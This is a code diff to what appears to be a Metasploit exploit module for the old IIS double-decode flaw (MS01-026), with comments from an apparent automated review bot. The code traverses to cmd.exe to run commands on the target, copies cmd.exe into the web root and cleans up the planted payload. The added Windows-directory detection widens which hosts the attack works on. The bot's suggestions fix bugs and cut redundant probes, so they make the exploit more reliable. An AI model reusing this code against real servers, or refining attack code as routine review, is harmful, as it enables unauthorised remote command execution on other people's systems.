diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
index f05ed5eefd..d78ded0ec5 100644
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 Opt::RPORT(80),
 OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
+ OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
 OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
 ], self.class)
@@ -105,14 +106,27 @@ class Metasploit3 < Msf::Exploit::Remote
 [headers, body]
 end
+
+ def detect_windows_dir()
+ win_dirs = [ 'winnt', 'windows' ]
+ win_dirs.each { |dir|
+
+ res = execute_command("dir", { :windir => dir })
+ if (res.kind_of?(Array))
+ body = res[1]
+ if (body and body =~ /Directory of /)
+ return dir
+ end
+ end
+ }
+ return nil
+ end
+
 def check
- res = execute_command("dir")
- if (res.kind_of?(Array))
- body = res[1]
- if (body and body =~ /Directory of /)
- return Exploit::CheckCode::Vulnerable
- end
+ @win_dir = detect_windows_dir()
+ if @win_dir
+ return Exploit::CheckCode::Vulnerable
 end
 Exploit::CheckCode::Safe
@@ -129,14 +143,15 @@ class Metasploit3 < Msf::Exploit::Remote
 # Using the "start" method doesn't seem to make iis very happy :(
 return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
- print_status("Executing command: #{cmd}")
+ print_status("Executing command: #{cmd} (options: #{opts.inspect})")
 uri = '/scripts/'
 exe = opts[:cgifname]
 if (not exe)
 uri << dotdotslash
 uri << dotdotslash
- uri << 'winnt/system32/cmd.exe'
+ uri << (opts[:windir] || @win_dir)
+ uri << '/system32/cmd.exe'
 else
 uri << exe
 end
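Review bot: The description of the new WINDIR option, `'The windows directory of the target host'`, does not say what form the value must take, yet the later hunks splice it verbatim between `dotdotslash` and `'/system32/cmd.exe'` in the request URI and between backslashes in the copy command, so a full path such as `C:\Windows` would yield a malformed path. Make the expected form explicit, e.g. `OptString.new('WINDIR', [ false, 'Name of the windows directory on the target (winnt or windows), not a full path; auto-detected when unset', nil ]),`. A cheap check that rejects values containing `\` or `/` before they are used would surface the mistake as a clear error rather than as a confusing HTTP failure.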
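Review bot: `detect_windows_dir()` is written as an imperative scan with an explicit `return dir` inside a brace-delimited multi-line `each` block and a trailing `return nil`, which is exactly what `Enumerable#find` expresses; the empty parens on the `def` and the `{ }` block spanning several lines also depart from the surrounding style. The rewrite below returns the same value (the first candidate whose listing matches, else nil) and issues the same probe requests. Note also that `check` now stores the result in `@win_dir`, but the `exploit` hunk on the next line overwrites it with `datastore['WINDIR']` and re-probes when that is nil, so the detection already done by `check` is discarded.

```ruby
  def detect_windows_dir
    # First candidate whose "dir" listing comes back, else nil.
    %w[winnt windows].find do |dir|
      res = execute_command("dir", { :windir => dir })
      res.kind_of?(Array) && res[1] && res[1] =~ /Directory of /
    end
  end
```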
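Review bot: `uri << (opts[:windir] || @win_dir)` raises `TypeError` (no implicit conversion of nil into String) whenever the caller passes no `:windir` and `@win_dir` has not been assigned yet, which is the case for any path that reaches this method before `check` or `exploit` has run; the resulting error points at string concatenation rather than at the missing directory. Resolve the value once and fail with a clear message: `win_dir = opts[:windir] || @win_dir`, `raise ArgumentError, 'windows directory unknown: set WINDIR or run check first' unless win_dir`, then `uri << win_dir`. The enclosing method (presumably execute_command, given the `cmd` and `opts` locals) starts and ends outside the hunk.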
@@ -156,12 +171,22 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
- # first copy the file
+ @win_dir = datastore['WINDIR']
+ if not @win_dir
+ # try to detect the windows directory
+ @win_dir = detect_windows_dir()
+ if not @win_dir
+ raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!"
+ end
+ end
+ print_status("Using windows directory \"#{@win_dir}\"")
+
+ # now copy the file
 exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
 # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
- # However, it using %SystemRoot% doesn't seem to work :(
- res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")
+ # Unfortunately, using %SystemRoot% doesn't seem to work :(
+ res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
 if (datastore['CMD'])
 res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
@@ -220,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote
 delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
 print_status("Changing permissions on #{delete_me_too} ...")
- cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
+ cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
 client.sys.process.execute(cmd, nil, {'Hidden' => true })
 print_status("Deleting #{delete_me_too} ...")
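Review bot: The nested `if not @win_dir` blocks and `raise RuntimeError, "..."` at the top of `exploit` read awkwardly: `unless` is the idiom for a negated condition, and `RuntimeError` is what a bare `raise 'msg'` already produces. Folding the lookup into one expression also lets a value already established by `check` be reused instead of probing the host a second time: `@win_dir = datastore['WINDIR'] || @win_dir || detect_windows_dir` followed by `raise "Unable to detect the target host windows directory (maybe not vulnerable)!" unless @win_dir`. The same `@win_dir` is interpolated into the `attrib.exe` path in the following hunk, so establishing it here with a clear failure keeps that later path well-formed. exploit's body continues past the end of the hunk.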